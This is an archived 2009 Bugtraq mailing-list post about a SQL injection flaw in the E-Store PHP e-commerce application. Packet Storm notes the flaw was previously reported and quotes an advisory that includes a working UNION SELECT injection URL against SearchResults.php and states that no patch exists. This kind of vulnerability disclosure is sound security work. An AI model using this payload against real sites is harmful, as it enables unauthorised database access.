lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 11 Dec 2009 23:06:41 -0500
From: Packet Storm <bugtraq@...ketstormsecurity.org>
To: Salvatore Fresta aka Drosophila <drosophilaxxx@...il.com>
Cc: Bugtraq <bugtraq@...urityfocus.com>
Subject: Re: E-Store SQL Injection Vulnerability

Previously discovered:

http://packetstormsecurity.org/0812-exploits/estore-sql.txt 856a5dc9cba52e892cbb54bd2e1a0a82 getaphpsite e-store suffers from a remote SQL injection vulnerability in SearchResults.php. Authored By <a href="mailto:trt-turk[at]hotmail.com">ZoRLu</a>

On Fri, Dec 11, 2009 at 05:50:54AM +0100, Salvatore Fresta aka Drosophila wrote:
> E-Store SQL Injection Vulnerability
> 
>  Name              E-Store
>  Vendor            http://www.getaphpsite.com
> 
>  Author            Salvatore Fresta aka Drosophila
>  Website           http://www.salvatorefresta.net
>  Contact           salvatorefresta [at] gmail [dot] com
>  Date              2009-09-03
> 
> X. INDEX
> 
>  I.    ABOUT THE APPLICATION
>  II.   DESCRIPTION
>  III.  ANALYSIS
>  IV.   SAMPLE CODE
>  V.    FIX
>  VI.   DISCLOSURE TIMELINE
> 
> 
> I. ABOUT THE APPLICATION
> 
> E-Store is a commercial PHP e-commerce.
> 
> 
> II. DESCRIPTION
> 
> This application presents a SQL Injection bug.
> 
> 
> III. ANALYSIS
> 
> Summary:
> 
>  A) SQL Injection
> 
> A) SQL Injection
> 
> The GET where parameter  passed to SearchResults.php has not
> properly sanitised. Because of the affected query, the Magic
> Quotes GPC flag (php.in) may be on.
> 
> 
> IV. SAMPLE CODE
> 
> http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
> ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
> 
> 
> V. FIX
> 
> No patch.

Powered by blists - more mailing lists